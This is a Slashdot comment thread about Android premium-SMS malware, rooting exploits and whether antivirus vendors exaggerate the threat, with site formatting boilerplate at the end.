Put something nice in the hands of the ignorant, and they will muck them up. It's what they always do. What's more, you let the greedy carriers and manufacturers decide when and how you can get updates and fixes, you'll find they won't be coming to your rescue.

I hate to say it since I'm an Android user myself, but these things have the advantages of a PC in that you can get any software you want onto these things. But they have an incredible weakness in that users can't casually "reload" the machine to clean them up.

I think it's time Android makers came up with a way for users to wipe and reload their devices as an alternative to processor and battery sucking anti-malware. We know they won't though... that'd open the doors to an even more fiendish group of people -- the firmware hackers!! If they leave things unlocked too much, they will lose a few bucks from people removing the bloatware from their phones and enabling features the carriers were careful to disable.

Actaully, yes (1)

toadlife (301863) | more than 2 years ago | (#38559036)

This is indeed a sign that Android has arrived. The malware authors are just going where the money is.

that'd open the doors to an even more fiendish group of people -- the firmware hackers!!

This is quite plausible. With my phone, the Epic 4G, a local root exploit was available for use for at least 6 months before they finally released the phone's Gingerbread update recently. While it was useful as a one-click-root solution, it could have also been useful as a tool for malware authors to embed their crap into the ROM.

Now, with the Gingerbread ROMS, new kernel exploits are already being discovered and put to use. I used one to root my wife's Epic 4G Touch, which was only released in November.

Undoubtedly the kernel exploit will linger for many, many months until Samsung releases a new ROM update.

They're everywhere (0)

Anonymous Coward | more than 2 years ago | (#38558886)

Heck, I'm even getting ads that say I have twenty viruses while playing Angry Birds.

F-Secure cannot read code (0)

Anonymous Coward | more than 2 years ago | (#38558918)

Last link in the ./ post links to a post on the F-Secure corporate blog. In the 3rd screenshot F-Secure provides a code snippet from a fake "World of Goo" which supposedly will send premium SMS to a short code number. F-Secure claims this code will do this in 18 countries.

I beg to disagree. Although the code is certainly malicious it only affects you if you happen to use a SIM card from Azerbaijan (az). That's the first if() clause in the source. After entering the while() loop the method will return right away. Code below line #8 will never be reached.

t-lo

Doubtful... (1)

SuperKendall (25149) | more than 2 years ago | (#38559156)

That's the first if() clause in the source. After entering the while() loop the method will return right away.

That looks more like some kind of bug in the decompiler. After all, they have SMS calls set up for other countries, why would the real call return?

I think the real code is something like the while loop with all of the country codes inside.

PEBKAC (1)

allo (1728082) | more than 2 years ago | (#38558952)

no app can send premium SMS without consent from the user. There is a big screen listing all the permissions the app wants to have, when you install an app. When your "virus scanner" sends a premium sms, it cannot be a big surprise, because it announced it while you installed it.

How to Spot the Malware (1)

blackest_k (761565) | more than 2 years ago | (#38559048)

lucky for me three of my android devices use wifi and 3g indirectly, but it seems the premium sms trojans are wrappers for popular paid applications.

So by applying a bit of common sense they are easy to avoid. For example Angrybirds is made and sold by Rovio so anyone selling Angrybirds who isn't Rovio is almost certainly untrustworthy and probably a good reason to flag the seller to Google.

cut the rope is by ZeptoLab and not by Lagostrod or Miriada so it's obvious the later two stink.

you can never be 100% safe but how do you benefit from an antivirus which identifies malware which has already been identified and outlets neutered?

Why not open and checked? (0)

Anonymous Coward | more than 2 years ago | (#38559184)

I don't understand why google can not check the apps before the go into the official store? Seems like they could check them, but not limit what goes in as long as it is not malicious.

the weekly A/V scam (5, Interesting)

Fuzi719 (1107665) | more than 2 years ago | (#38559242)

It seems every week there is another "Oh Nos! Android is infested with malware!" article extolling the virtues of Apple and claiming all Android phones MUST install some A/V app or else your hair is going to fall out, your dog will get pregnant and your lawn will turn brown. Every one of these articles can be traced back to one of the major A/V vendors (who just happen to have a convenient Android A/V app for sale) or Apple. It is all FUD and BULLSH*T. Are there malware out there for Android? Yes. Is it widespread in the US? No. I've worked with Android phones for years, work with several administrators in corporate environments who service hundreds of Android phones, know dozens of friends with Android phones. I have NEVER encountered a single bit of malware. Not once. The few bits of malware that have gotten into the system in the US were quickly taken care of by Google. Tell me, have any of you EVER seen this "widespread malware" out in the field?

Get a real anti-virus app (1)

euroq (1818100) | more than 2 years ago | (#38559580)

Get a real anti-virus app for Android like Lookout, and it won't ever happen to you.

Yep.. even seen the adverts on TV (0)

Anonymous Coward | more than 2 years ago | (#38559604)

free mcafee antivirus for your new tablet / phone when you buy from [major store here] ;-)

Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Sign up for Slashdot Newsletters
Create a Slashdot Account

Loading...